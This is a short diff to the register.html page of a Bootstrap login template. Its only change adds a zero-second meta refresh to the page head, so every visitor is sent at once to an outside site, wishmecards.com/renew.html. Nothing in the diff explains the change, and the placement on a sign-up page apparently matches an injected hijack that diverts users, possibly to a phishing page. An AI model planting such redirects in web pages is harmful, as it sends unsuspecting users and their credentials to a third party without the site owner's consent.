--- a/register.html
+++ b/register.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html>
-   <head>
+   <head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" />
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <title>Bootstrap Login Page Card with Floating Labels</title>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
